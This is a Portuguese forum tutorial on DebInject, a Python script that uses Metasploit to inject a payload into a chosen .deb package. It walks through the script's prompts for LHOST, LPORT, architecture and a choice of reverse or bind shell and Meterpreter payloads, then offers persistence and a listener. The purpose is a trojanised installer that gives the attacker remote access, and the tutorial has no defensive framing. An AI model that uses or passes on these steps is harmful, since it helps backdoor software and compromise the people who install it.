Metasploit – DebInject – Injeção de Codigo em arquivo .deb

OBS: Versão Python 2.7
OBS2: É preciso ter o Metasploit instalado pois ele utilizara o msfconsole e o msfvenom.

Bom galera hoje trago para vocês um script onde ele lhe permite injetar um payload em arquivo .deb de sua escolha bom primeiramente tera que baixar o script em python no git.

Descrição

OBS: Versão Python 2.7
OBS2: É preciso ter o Metasploit instalado pois ele utilizara o msfconsole e o msfvenom.

Bom galera hoje trago para vocês um script onde ele lhe permite injetar um payload em arquivo .deb de sua escolha bom primeiramente tera que baixar o script em python no git.
https://github.com/UndeadSec/Debinject/ … binject.py

depois disso executara o script.

.

Code: Select all

python debinject.py

.

Code: Select all

Insert *.deb file path:

primeiro ele vai pedir para você colocar o nome do arquivo .deb que você quer injetar o payload

.

Code: Select all

Insert LHOST:

depois ele pedira o LHOST que nada mais é do que seu ip

.

Code: Select all

Insert LPORT:

depois pedira a LPORT, fica de sua preferencia a porta que sera usada

.

Code: Select all

Insert the target arch x86 or x64:

depois ele pedira qual arquitetura do alvo se é 32 bits sera x86 se for 64 bits sera x64

.

Code: Select all

[1] metasploit/linux/<arch>/shell/reverse_tcp"
[2] metasploit/linux/<arch>/meterpreter/reverse_tcp"
[3] metasploit/linux/<arch>/meterpreter/bind_tcp"
[4] metasploit/linux/<arch>/shell/bind_tcp

depois ele pedira para você escolher entre 4 payloads fica de sua preferencia de acordo com seu objetivo

.

Code: Select all

Do you want to enable persistence?(y/n) :

depois ele pergunta se você vai querer habilitar uma persistencia fica de sua preferencia.

.

Code: Select all

Do you want to start listener? (y/n):

depois ele pergunta se você vai querer iniciar o listener